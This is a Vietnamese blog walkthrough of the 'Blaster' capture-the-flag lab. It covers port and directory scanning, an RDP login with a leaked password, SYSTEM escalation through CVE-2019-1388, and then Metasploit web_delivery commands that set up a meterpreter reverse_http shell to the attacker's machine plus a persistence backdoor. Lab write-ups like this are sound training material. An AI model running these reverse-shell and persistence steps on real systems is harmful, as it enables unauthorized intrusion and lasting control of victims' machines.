Advertisement

Responsive Advertisement

Blaster-A blast from the past!

 


Bước 1: Thu thập thông tin

Now that we've launched our target, let's perform some basic enumeration of the services running on it!


Sử dụng công cụ nmap để dò quét thông tin

nmap -sC -Pn -T4 ip_victim     

Thu được 2 công dịch vụ là 80(web) và 3389(rdp)
Mình  tiến hành vào website của xem có gì không phát hiện đây chỉ là web mặc định của window 

 Mình tiến hành thử dò quét các đường dẫn khác xem có không bằng công cụ gobuster
gobuster dir -u http://ip_victim -w /data/src/wordlists/directory-list-2.3-medium.txt -b 404,403 -t 50  

Kết quả thu được đường dẫn /retro mình truy cập vào thấy được một website nói về rất nhiều trò chơi khá cổ ở đĩa DVD 

Mình kéo xuống xem qua thông tin của nó thấy một số thông tin như tác giả bài viết, tên game,...


Mình kéo xuống thêm một chút thì  thấy được một tác giả tên là Wade mình thử truy cập vào phần RECENT COMMENTS của người này và phát hiện một thông tin về mật khẩu là: parzival



Từ thông tin thu thập được trên mình tiến hành sang bước 2.

Bước 2: Khai thác dịch vụ remote desktop

Now that we've gained access to our target system, let's see if we can find a way to escalate. To start, let's scout around the system to see if we can find anything of interest.

Mình truy cập tới máy chủ window victim để khai thác, sử dụng công cụ remina trên kali


Đọc lá cờ đầu trong tệp tin user.txt, sau đó tiến hành kiểm tra phát hiện một tệp tin là hhupd.exe chưa biết tệp này là gì mình thử tìm kiếm thông tin và phát hiện đây là một phầm mềm độc khai khai thác lỗ hổng về leo thang trên window mà không cần xác thực mã CVE-2019-1388

Mình dựa theo video khai thác demo sau để thực hiện leo thang


Mình mở tệp mã độc ra lần lượt thực hiện các bước để truy cập đến liên kết thực thi leo thang



Ở bước này mình thực hiện bấm ctrl + s




cmd
whoami


Kiểm tra mình đã có quyền nt authority\system quyền cao nhất trên hệ thống window, mình liền vô kiểm tra thư mục user thấy user Administrator, mình vô thấy tệp tin root.txt, mình đọc nó là thu được lá cờ cuối cùng


Không dừng lại ở đây, vì thế nó hơi nhạt nhẽo mình sang bước số 3 tạo mã độc chảy ẩn trong hệ thống này gọi là một con trojan cho dễ để khai thác.

Bước 3: Tạo mã độc khai thác về sau

Now that we've thoroughly compromised our target machine, let's return to our exploitation tools so that we can gain remote shell access and persistence.

Mình tiến hành chạy msfconsole ở trên kali, sử dụng mã độc web_delivery

use exploit/multi/script/web_delivery
show targets



set target 2
set lhost ip_vpn_kali
set lport 443( tùy bạn)


set payload windows/meterpreter/reverse_http
set lhost ip_vpn_kali 
run



Đem mã vừa sinh sang bên cửa sổ cmd của máy window dán nó vào và chạy.

Bên máy kali mình thu được phiên kết nối

Mình tiếp tục dùng đến lệnh tiếp theo để vào phiên truy cập
sessions
sessions 1
getuid



Thực hiện lệnh cuối  cùng để mỗi khi mở máy sẽ có kết nối về máy của chúng ta

run persistence -X
😁😁😁😁😁 

Post a Comment

0 Comments